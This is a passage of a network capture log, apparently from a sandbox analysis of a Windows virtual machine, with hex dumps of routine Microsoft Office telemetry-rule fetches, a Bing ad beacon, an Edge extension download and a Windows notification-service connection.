2024-11-23 06:09:43 UTC	583	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:42 GMT Content-Type: application/octet-stream Content-Length: 70207 Connection: close Content-Encoding: gzip Last-Modified: Fri, 22 Nov 2024 21:01:12 GMT ETag: 0x8DD0B38CBCCFA90 x-ms-request-id: a26d36d7-101e-003c-443c-3ddcdc000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241123T060942Z-178bfbc474brk967hC1NYCfu6000000003yg000000002kff Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 69316365 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-23 06:09:43 UTC	15801	IN	Data Raw: 1f 8b 08 08 18 f1 40 67 02 ff 61 73 73 65 74 00 ec bd 0b 97 db 36 b2 30 f8 57 b2 b9 33 b3 dd 89 d5 d6 5b dd d9 cd fa f4 d3 f1 f8 39 6d 3b 19 db f1 d5 01 49 48 a2 45 91 0c 1f 6a ab c3 be bf 7d 0b 05 80 00 08 50 52 db ce 77 ef b7 67 67 9c 16 09 14 0a 40 a1 50 a8 2a 14 c0 3f bf f7 93 78 16 ce bf ff e9 bb 3f bf 2f 92 25 8d a7 51 b8 0a 0b 78 ef 8d bb dd 07 df 7d 9f 92 39 9d fa 65 91 cc 66 90 38 1c f4 59 62 40 67 a4 8c 8a 69 94 f8 24 a2 d3 15 49 11 81 c7 f0 c0 df 0e 3c 00 94 97 e3 6b de f1 08 7b a5 11 7b a5 51 67 9e e1 6b 8c af 71 a7 cc f1 15 81 69 de 59 7d c6 d7 02 5f 8b 0e a5 ec d5 c7 5c 3f ef f8 b7 ec 35 20 ec 35 20 9d 60 89 af 14 5f 69 27 40 e0 19 e6 ce 48 27 c4 8a 66 21 be 86 1d 78 60 af 19 be 66 9d 19 e6 2e b0 ec 82 76 c2 08 5f 31 77 91 75 16 3c b7 c4 d7 Data Ascii: @gasset60W3[9m;IHEj}PRwgg@P*?x?/%Qx}9ef8Yb@gi$I<k{{QgkqiY}_\?5 5 `_i'@H'f!x`f.v_1wu<
2024-11-23 06:09:43 UTC	16384	IN	Data Raw: 4a b0 09 cb 82 45 ac c5 f3 e8 07 bb 82 71 ba da 2a 0b c7 62 2c 30 96 c2 52 09 74 65 c0 2a 8a c3 88 95 9c 7c 3e a9 79 09 d4 fa 9a 9f 30 4a 49 28 2b d7 97 ff 7a 7b f9 fa cd f4 c9 05 68 2b 37 9c c1 08 01 cb 2f 28 f3 02 34 de 08 0c a6 34 da 38 c6 ec 48 27 33 28 96 9f 45 d9 4f 9f 12 f7 54 d2 47 a6 39 87 08 81 e9 6d 4f c1 43 97 10 bf ad 59 55 67 39 13 fe 1e 05 67 65 16 87 6c 9b f5 cb 90 60 eb 3d ea 25 09 33 8b f9 4a fb 10 ef 11 3b 7c e8 61 60 14 a0 60 b9 7c 16 e7 69 54 b1 c3 22 c0 e0 29 df c2 05 4c 8f bc f0 67 5e 04 75 33 51 9a b7 e1 61 1a 61 48 f5 c3 30 f7 62 91 d5 a8 34 39 2a 97 ff 2d f5 aa c1 c2 6c 78 e0 35 33 d1 42 b3 75 c4 be 3b f4 d0 68 83 51 a7 81 2d a0 ff 0d 5d 10 62 ed 7f 55 a5 99 9f 25 2b 2f a4 4d 09 21 65 43 c7 04 cf 93 19 f3 c1 d0 b6 e9 14 38 59 31 Data Ascii: JEqb,0Rte\|>y0JI(+z{h+7/(448H'3(EOTG9mOCYUg9gel`=%3J;\|a``\|iT")Lg^u3QaaH0b49*-lx53Bu;hQ-]bU%+/M!eC8Y1
2024-11-23 06:09:43 UTC	16384	IN	Data Raw: 2f 4d 35 19 b9 3f d5 c1 f4 52 a7 67 b3 99 ff bc b7 c2 8e 7c d3 4d 9a a5 bf dc f0 20 15 b1 bc 1f 82 9a 8d 98 a7 af db 80 6b 74 e7 ab 7c e6 18 7d 9a 2b 3e 34 2d 1a e7 c0 d5 e8 b4 a0 0e d4 7d 19 bb 69 52 58 a2 33 32 78 db 4b 2d cd 54 dd d2 2b 9c a0 29 69 1a ba 4a ee 0a 4d 33 5a 7b a7 1a 83 5f f3 f7 fe 2c 2f 84 3b 39 d0 56 82 ef 75 a4 f3 69 57 af 58 09 8c 2a 1d 24 b9 4e 6b cf 63 d0 74 99 e3 02 0f 26 7f 1a 86 a9 a8 69 fa 5a d8 25 83 c1 ea f8 fd 12 62 16 86 38 17 5a 19 6f 13 03 00 e6 6a 07 a4 40 be bb 20 de a6 de bf d1 06 75 32 1f c3 4f 67 41 ad 31 bd b0 9c ee 44 47 33 2a 92 9c d3 f6 35 64 a9 b1 d3 f6 b1 c7 a7 b4 80 af ea c1 2a 6c dd 81 a0 0b 67 ca d2 b2 11 7c 8d dc 39 47 56 d1 bd 08 e8 ec 3e 4f c9 56 d6 7a d3 9a 56 4d 17 50 41 9b 17 9b 37 36 da 2e 7c a4 ba 63 Data Ascii: /M5?Rg\|M kt\|}+>4-}iRX32xK-T+)iJM3Z{_,/;9VuiWX$Nkct&iZ%b8Zoj@ u2OgA1DG35d*lg\|9GV>OVzVMPA76.\|c
2024-11-23 06:09:43 UTC	16384	IN	Data Raw: 99 dc 5a 2e 69 cf 52 41 9e 48 c8 71 d7 39 94 dd f7 b6 3f 2a 48 d1 b5 2e 37 a4 97 5f 43 54 c9 8d d7 76 7a 14 e4 6f 3b 80 f7 6a 61 e8 6f 47 e9 2d cb 60 84 66 2b c0 b9 77 09 1b c0 32 5c aa 6c 0e 25 81 ed a0 5e 61 25 37 6f 3c a5 bc 1f 04 1a dd b1 04 1d c9 73 16 3a 58 a8 69 4d 12 c1 5e e9 66 5f 14 6c e4 9e d4 61 25 e1 2f c3 fc b8 ed df 80 5d 2b 3a 5b 4c 56 c9 72 1f 59 1d 6a 72 0b d2 b0 4c 8e d5 67 db 16 79 41 90 65 4f 4b 68 63 f6 d1 e5 db b6 6a 18 e6 ca 5f 04 79 2e 71 69 5d 0e 19 cc d9 f6 58 27 58 af 1c 18 04 f1 98 d2 bf 15 1e 37 ce e0 1e 88 54 83 3c 82 f8 a8 05 5f b0 1b 3f 2f 02 8f 31 a4 e9 1d ed 45 e6 e4 85 e6 b9 66 4c fd cd 8d e4 58 f7 79 73 8b 47 40 25 b6 0d 7f 78 ff a8 fe e7 7d 69 4a fc 00 c7 b0 37 a9 44 f0 40 1e e8 bd 41 8a b4 0a 5d 5a 2c 0e 60 f7 fb 81 Data Ascii: Z.iRAHq9?*H.7_CTvzo;jaoG-`f+w2\l%^a%7o<s:XiM^f_la%/]+:[LVrYjrLgyAeOKhcj_y.qi]X'X7T<_?/1EfLXysG@%x}iJ7D@A]Z,`
2024-11-23 06:09:43 UTC	5254	IN	Data Raw: 29 50 5f 50 34 9a d3 9a 2a 83 ab 27 93 58 c5 2b d2 9c af 2b 4e 0f 79 ac a9 56 57 20 b1 61 ca d2 f5 ed 38 df 10 b9 60 88 4c 48 ac b1 cd 10 b5 8f 76 49 19 f2 b6 d5 54 1d d1 9c b1 20 7a d3 64 f7 91 a2 0c 4d 73 6d e0 da be ee e6 87 03 9f 5e f7 4f 98 9c 12 cd 88 68 4c 2e b1 48 00 60 c3 31 74 31 8d 87 b4 32 56 02 4f bf e1 a9 3b c0 40 d6 24 8e 10 55 c7 c3 e7 8c f3 78 28 78 d3 94 de b0 5a 4d 22 eb 28 5c 22 00 98 8e 15 1a f8 ab ac 54 f4 5d 80 d0 a5 aa 6e 87 83 fd d6 f1 b0 c0 82 f7 f4 5e ef 2f 2b b8 62 a2 13 a1 4d ae 60 cf 59 3c b1 b1 f4 40 4d 41 74 7c ac 2c 5a 9e ef f4 d2 81 6d 69 e1 d3 8b 73 2c 84 2c 06 37 fd 72 38 10 a5 b2 13 51 f1 a0 a2 06 7d 3f 89 8f 72 35 a0 58 a0 46 79 2f b7 1f cc 57 92 ec c8 b4 b5 f2 5c 65 e7 30 5a 93 e3 b1 8e 5f f5 91 44 87 44 19 1d 59 83 Data Ascii: )P_P4*'X++NyVW a8`LHvIT zdMsm^OhL.H`1t12VO;@$Ux(xZM"(\"T]n^/+bM`Y<@MAt\|,Zmis,,7r8Q}?r5XFy/W\e0Z_DDY

Session ID	Source IP	Source Port	Destination IP	Destination Port
92	192.168.2.6	49866	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:43 UTC	192	OUT	GET /rules/rule120654v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:43 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:43 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT ETag: "0x8DC582BA54DCC28" x-ms-request-id: ce4e00c6-401e-00a3-3516-3d8b09000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060943Z-178bfbc474bwlrhlhC1NYCy3kg000000045g000000000uwa x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:43 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
93	192.168.2.6	49863	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:43 UTC	192	OUT	GET /rules/rule120650v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:43 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:43 GMT Content-Type: text/xml Content-Length: 479 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B989EE75B" x-ms-request-id: 79b51860-701e-0021-623a-3c3d45000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060943Z-174c587ffdfcj798hC1TEB9bq400000002mg00000000mwf0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:43 UTC	479	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
94	192.168.2.6	49865	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:43 UTC	192	OUT	GET /rules/rule120652v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:43 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:43 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT ETag: "0x8DC582B97E6FCDD" x-ms-request-id: 79a9dcb6-201e-003c-1c7b-3b30f9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060943Z-178bfbc474btrnf9hC1NYCb80g000000049g000000002tpu x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:43 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
95	192.168.2.6	49867	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:43 UTC	192	OUT	GET /rules/rule120653v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:43 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:43 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT ETag: "0x8DC582B9C710B28" x-ms-request-id: 7fefabc9-101e-000b-0f11-3d5e5c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060943Z-178bfbc474bw8bwphC1NYC38b400000003z0000000003a6d x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-23 06:09:43 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
96	192.168.2.6	49864	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:43 UTC	192	OUT	GET /rules/rule120651v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:43 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:43 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: 4ec76ea5-a01e-006f-014e-3c13cd000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060943Z-178bfbc474bwh9gmhC1NYCy3rs000000043000000000d4bh x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:43 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.6	49870	150.171.28.10	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:43 UTC	921	OUT	GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8XpvYC-MBe0myEW6golJ_GDVUCUzVUqO7VAJu9k0LBvkUqkHqdYJDcTC3jvhADekXoV1AdFCf6FWbwraZckO4X8KpUINfxMM6txy5g60n1_Xow0LVYxFcNhSn3nqBUO-NGPs93RXdr4_5VVdstCsS4tkONacY8_sX13I8LFEF-MRfG4dc%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy5taWNyb3NvZnQuY29tJTJmZWRnZSUyZndpbmRvd3MtZWRnZSUzZmZvY3VzJTNkY29udmVuaW5jZSUyNnNvdXJjZSUzZGlwJTI2ZXMlM2QwJTI2Zm9ybSUzZE01MDBFNyUyNk9DSUQlM2RNNTAwRTc%26rlid%3Dad9f3ed314431d35042e599265d1724f&TIME=20241123T060929Z&CID=531538185&EID=&tids=15000&adUnitId=11730597&localId=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&deviceId=6966555320912735&anid=DA18C8825356BAC4E7B23066FFFFFFFF HTTP/1.1 Accept-Encoding: gzip, deflate User-Agent: WindowsShellClient/9.0.40929.0 (Windows) Host: g.bing.com Connection: Keep-Alive Cookie: MUID=11842F2995276B2636F13A6994556AB9; _EDGE_S=SID=0F11C281283966371C7FD7C129216766; MR=0
2024-11-23 06:09:44 UTC	765	IN	HTTP/1.1 204 No Content Cache-Control: no-cache, must-revalidate Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Set-Cookie: MSPTC=xb_X_qgh5Gc7pYc6C0p943tw3cq9JSKSRf1T4lBxkcI; domain=.bing.com; expires=Thu, 18-Dec-2025 06:09:43 GMT; path=/; Partitioned; secure; SameSite=None Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * X-Cache: CONFIG_NOCACHE Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 88B11A22369948CB9EF8FDFBB1BA3ACC Ref B: EWR311000107049 Ref C: 2024-11-23T06:09:43Z Date: Sat, 23 Nov 2024 06:09:43 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.6	49876	23.219.161.135	443	7312	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:43 UTC	612	OUT	GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1732946980&P2=404&P3=2&P4=cz4ApeZwqIPGRcS0Kaip5Qa4hDXmOEgDAshSQDxo4TY8ImPCefQtx3scwb012JTPTQw5hOsEhxx45xk1jp2tgA%3d%3d HTTP/1.1 Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com Connection: keep-alive MS-CV: mHkrbEd1Ei6/QLAg+uTnjF Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-23 06:09:44 UTC	1246	IN	HTTP/1.1 200 OK Content-Type: application/x-chrome-extension Last-Modified: Wed, 24 Jan 2024 00:25:37 GMT Accept-Ranges: bytes ETag: "Gv3jDkaZdFLRHkoq2781zOehQE8=" Server: Microsoft-IIS/10.0 X-AspNetMvc-Version: 5.3 MS-CorrelationId: ed28c9bc-ef86-4e47-bd17-4d9ac0aafb04 MS-RequestId: b73ae10a-61ef-44b5-8023-89dce3fab908 MS-CV: GJizXTsAP6nvaKuzCrUe+4.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET X-Powered-By: ARR/3.0 X-Powered-By: ASP.NET Content-Length: 11185 Cache-Control: public, max-age=86374 Date: Sat, 23 Nov 2024 06:09:44 GMT Alt-Svc: h3=":443"; ma=93600,h3-29=":443"; ma=93600,h3-Q050=":443"; ma=93600,quic=":443"; ma=93600; v="46,43" Connection: close Akamai-Request-BC: [a=23.35.17.145,b=684645239,c=g,n=US_NJ_EDISON,o=20940],[c=c,n=US_NJ_EDISON,o=20940] MSREGION: X-CCC: X-CID: 3 Akamai-GRN: 0.91112317.1732342183.28cedb77 Access-Control-Max-Age: 86400 Access-Control-Allow-Credentials: true Access-Control-Expose-Headers: Server,range,hdntl,hdnts,Akamai-Mon-Iucid-Ing,Akamai-Mon-Iucid-Del,Akamai-Request-BC Access-Control-Allow-Headers: origin,range,hdntl,hdnts,CMCD-Request,CMCD-Object,CMCD-Status,CMCD-Session Access-Control-Allow-Methods: GET,POST,OPTIONS Access-Control-Allow-Origin: *
2024-11-23 06:09:44 UTC	11185	IN	Data Raw: 43 72 32 34 03 00 00 00 1d 05 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 bb 4e a9 d8 c8 e8 cb ac 89 0d 45 23 09 ef 07 9e ab ed 9a 39 65 ef 75 ea 71 bc a5 c4 56 59 59 ef 8c 08 40 04 2b ed 43 d0 dc 6b a7 4f 88 b9 62 4b d3 60 94 de 36 ee 47 92 ab 25 8a 1e cc 0d fa 33 5a 12 19 8e 65 20 5f fd 36 15 d6 13 1e 46 ae 8b 31 70 18 f1 a8 4b 1d 5a ff de 0e 83 8e 11 b2 2f 20 ed 33 88 cb fb 4f 54 94 9e 60 00 d3 bc 30 ab c0 d7 59 8b b0 96 46 54 fc f0 34 33 1c 74 68 d6 79 f9 0c 8c 7d 8a 91 98 ca 70 c6 4c 0f 1b c8 32 53 b9 26 69 cc 60 09 8d 6f ec f9 a6 66 8d 6f 48 81 0e 05 8a f1 97 4e b8 c3 94 3a b3 f7 69 6a 54 89 33 da 9e 46 7b d1 30 bb 2c cc 66 3f 27 66 e3 43 51 74 3b 62 5f 22 50 63 08 e5 20 Data Ascii: Cr240"0*H0NE#9euqVYY@+CkObK`6G%3Ze _6F1pKZ/ 3OT`0YFT43thy}pL2S&i`ofoHN:ijT3F{0,f?'fCQt;b_"Pc

Session ID	Source IP	Source Port	Destination IP	Destination Port
99	192.168.2.6	49878	20.198.118.190	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:45 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 51 33 4b 56 62 42 64 33 75 55 47 38 4f 53 61 4b 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 32 66 30 36 35 34 66 37 64 39 37 35 31 36 37 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: Q3KVbBd3uUG8OSaK.1Context: 22f0654f7d975167
2024-11-23 06:09:45 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
